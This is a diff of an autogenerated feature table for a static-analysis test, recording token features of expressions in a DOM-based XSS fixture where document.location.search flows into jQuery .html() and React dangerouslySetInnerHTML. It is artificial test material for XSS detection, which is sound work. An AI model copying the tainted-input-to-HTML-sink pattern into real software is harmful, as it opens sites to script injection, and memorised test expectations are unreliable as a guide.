tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:21 | $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:21 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:21 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:21 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:21 | exceptional return of $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:21 | exceptional return of $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:21 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:26 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:26 | $('myId').html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:26 | $('myId').html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:26 | $('myId').html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:26 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:49 | $('myId ... ainted) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:49 | $('myId ... ainted) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:49 | $('myId ... ainted) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:49 | $('myId ... ainted) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:49 | $('myId ... ainted) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:49 | exceptional return of $('myId ... ainted) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:49 | exceptional return of $('myId ... ainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:49 | exceptional return of $('myId ... ainted) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:49 | exceptional return of $('myId ... ainted) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:49 | exceptional return of $('myId ... ainted) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:215:15:215:20 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:215:15:215:20 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:215:15:215:20 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16937,6 +117284,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:215:15:215:20 | 'myId' | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:215:15:215:20 | 'myId' | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:215:15:215:20 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:23:215:26 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:23:215:26 | html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:215:23:215:26 | html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:23:215:26 | html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:23:215:26 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:28:215:31 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:28:215:31 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:215:28:215:31 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:28:215:31 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:28:215:31 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:28:215:37 | this.state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:28:215:37 | this.state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:215:28:215:37 | this.state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:28:215:37 | this.state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:28:215:37 | this.state | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:215:28:215:48 | this.st ... Tainted | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:215:28:215:48 | this.st ... Tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:215:28:215:48 | this.st ... Tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16944,6 +117306,61 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:215:28:215:48 | this.st ... Tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:215:28:215:48 | this.st ... Tainted | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:215:28:215:48 | this.st ... Tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:33:215:37 | state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:33:215:37 | state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:215:33:215:37 | state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:33:215:37 | state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:33:215:37 | state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:39:215:48 | notTainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:39:215:48 | notTainted | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:215:39:215:48 | notTainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:39:215:48 | notTainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:39:215:48 | notTainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:217:16 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:217:16 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:217:16 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:217:16 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:217:16 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:217:25 | this.setState | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:217:25 | this.setState | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:217:25 | this.setState | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:217:25 | this.setState | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:217:25 | this.setState | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:219:14 | exceptional return of this.se ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:219:14 | exceptional return of this.se ... }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:219:14 | exceptional return of this.se ... }) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:219:14 | exceptional return of this.se ... }) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:219:14 | exceptional return of this.se ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:219:14 | this.se ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:219:14 | this.se ... }) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:219:14 | this.se ... }) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:219:14 | this.se ... }) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:217:13:219:14 | this.se ... }) | fileImports | ansi-to-html | +| 